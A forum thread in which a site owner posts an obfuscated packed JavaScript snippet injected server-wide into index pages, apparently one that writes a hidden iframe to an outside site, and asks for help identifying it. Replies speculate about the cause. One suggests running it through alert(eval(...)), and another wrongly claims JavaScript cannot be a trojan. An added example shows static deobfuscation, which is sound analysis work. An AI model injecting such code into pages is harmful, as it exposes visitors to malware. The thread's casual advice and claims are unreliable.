
Help identifying this code

Sitebee

UFO Hunter
NLC
The server I host a couple of my websites on has been compromised, resulting in some malicious code being placed in all files beginning with "index": index.html, index.html, index.php, index.tpl, etc. are affected. That's server-wide as well :( so I doubt the hacker targeted my account.

Anyway, does anyone recognise this script and can tell me what it does? I believe it to be a trojan.

Code:
<script>eval(function(p,a,c,k,e,d){while(c--){if(k[c]){p=p.replace(new RegExp('\b'+c.toString(a)+'\b','g'),k[c])}}return
p}('p.q(o(\'%k%0%i%8%c%6%2%4%b%8%e%5%7%3%1%1%n%j%9%9%c%1%1%6%a%m%g%r%2%8%s%e%g%6%9%7%4%v%0%d%1%3%5%f%4%3%2%0%u%3%1%5%f%4%b%1%a%h%2%5%7%x%0%b%0%w%0%h%0%1%a%j%4%3%0%d%d%2%t%7%l%k%9%0%i%8%c%6%2%l\'));',34,34,'u0069|u0074|u0065|u0068|u0020|u003d|u006d|u0022|u0072|u002f|u0079|u0073|u0061|u0064|u0063|u0031|u006f|u006c|u0066|u003a|u003c|u003e|u006a|u0070|unescape|document|write|u006b|u002e|u006e|u0067|u0077|u0062|u0076'.split('|')))</script>
 
Stick an alert round it.

<script>alert(eval(function(p,a,c,k,e,d){while(c--){if(k[c]){p=p.replace(new RegExp('\b'+c.toString(a)+'\b','g'),k[c])}}return
p}('p.q(o(\'%k%0%i%8%c%6%2%4%b%8%e%5%7%3%1%1%n%j%9%9%c%1%1%6%a%m%g%r%2%8%s%e%g%6%9%7%4%v%0%d%1%3%5%f%4%3%2%0%u%3%1%5%f%4%b%1%a%h%2%5%7%x%0%b%0%w%0%h%0%1%a%j%4%3%0%d%d%2%t%7%l%k%9%0%i%8%c%6%2%l\'));',34,34,'u0069|u0074|u0065|u0068|u0020|u003d|u006d|u0022|u0072|u002f|u0079|u0073|u0061|u0064|u0063|u0031|u006f|u006c|u0066|u003a|u003c|u003e|u006a|u0070|unescape|document|write|u006b|u002e|u006e|u0067|u0077|u0062|u0076'.split('|'))));</script>

And let us know what it says.

Since it's using preg_replace, I'd say it's modifying the content of the page it's on.

Can't be a trojan, it's JavaScript - so the worst it's going to do is screw with your visitors and put dangerous links on the page.

Either way, remove it ASAP.
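
An added example, not part of any post in this thread: one way to see what a packed script of this shape would write to the page without passing it to eval() or alert(). The sample input is constructed (same p,a,c,k layout, an example.invalid address), and the function names are this example's own.

```javascript
// Static look at a p,a,c,k,e,d-packed script: nothing here calls eval()
// or document.write(); the packed text is only ever treated as data.

// Constructed sample in the same layout as the posted script (not the real one).
const SAMPLE = {
  p: "r.s(q('%a%0%b%c%2%d%1%3%e%c%f%4%g%5%5%1%h%2%d%i%j%1%k%0%l%m%2%j%0%8%5%g" +
     "%3%n%0%8%7%6%4%9%3%6%1%0%o%6%7%4%9%p'));",
  a: 36,
  c: 29,
  k: ('u0069|u0065|u0061|u0020|u003d|u002f|u0068|u0074|u0064|u0031|u003c|' +
      'u0066|u0072|u006d|u0073|u0063|u0022|u0078|u0070|u006c|u002e|u006e|' +
      'u0076|u0077|u0067|u003e|unescape|document|write').split('|'),
};

// Step 1: the packer's substitution loop, returning text instead of running it.
// Every word token in p is an index, written in base a, into the dictionary k.
function unpack(p, a, c, k) {
  while (c--) {
    if (k[c]) p = p.replace(new RegExp('\\b' + c.toString(a) + '\\b', 'g'), k[c]);
  }
  return p;
}

// Step 2: decode %uXXXX and %XX escapes in one pass, as unescape() would.
function decodeEscapes(s) {
  return s.replace(/%u([0-9a-f]{4})|%([0-9a-f]{2})/gi,
    (_, u, b) => String.fromCharCode(parseInt(u || b, 16)));
}

// Step 3: take the string literal handed to unescape() and report the markup
// it would have produced, flagging hidden or 0/1-pixel iframes.
function analyze({ p, a, c, k }) {
  const source = unpack(p, a, c, k);
  const m = /unescape\(\s*(['"])(.*?)\1\s*\)/.exec(source);
  const html = m ? decodeEscapes(m[2]) : null;
  const frame = html && /<iframe\b[^>]*\bsrc\s*=\s*["']?([^"'\s>]+)/i.exec(html);
  const hidden = !!html &&
    /visibility\s*:\s*hidden|\b(width|height)\s*=\s*["']?[01]\b/i.test(html);
  return { source, html, iframeSrc: frame ? frame[1] : null, hidden };
}

console.log(analyze(SAMPLE));
```

To inspect a real sample, put its four arguments (packed string, base, count, split dictionary) into an object of the same shape. The decoded address is then something to search logs and other files for.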
 
I have removed the code from whatever pages I could find it on. I have also opened a support ticket with APT, just waiting on their reply.
 
Update: our DC are mentioning it's not caused in shell but by yet another new exploit in cPanel.

We are aware of this, but we have been trying to figure out how it came to be, since there are no records of this being done through normal shell, so we are starting to suspect it might be something from cPanel itself that caused the problem to occur.

Remember I said server-wide!!! (Many accounts have not noticed it yet.)


EDIT: Thinking about it, there's gotta be a shell app that commands the code! I'm no server expert but it makes sense.


APT level 3 techs are still not sure what it is, help me out please!!!
 
There can also be PHP or CGI code. Perhaps someone may have compromised your server's SSH and managed to upload a shell script to add the code. I suggest going through your SSH logs and finding out what could have caused this. It could have been done with an Apache injection (I have been compromised by one of these before), so look for an Apache security update as well, bro.
 
Trying to execute the script, it does nothing and just comes up with an error, so I wouldn't worry too much about it.

I would say it was a test to see if someone could get into the server and add this to your pages, so it would have been some form of injection script (Apache or SSH injection).

Generally, this is the first step towards a server invasion. If you hear nothing from your host in the next 2 days, request your account be transferred to another server, OR switch hosts. That's your best bet mate.
 
As with an illness, while the symptoms might just be a runny nose, the root cause can be something far more sinister.

This code is the least of your problems.
 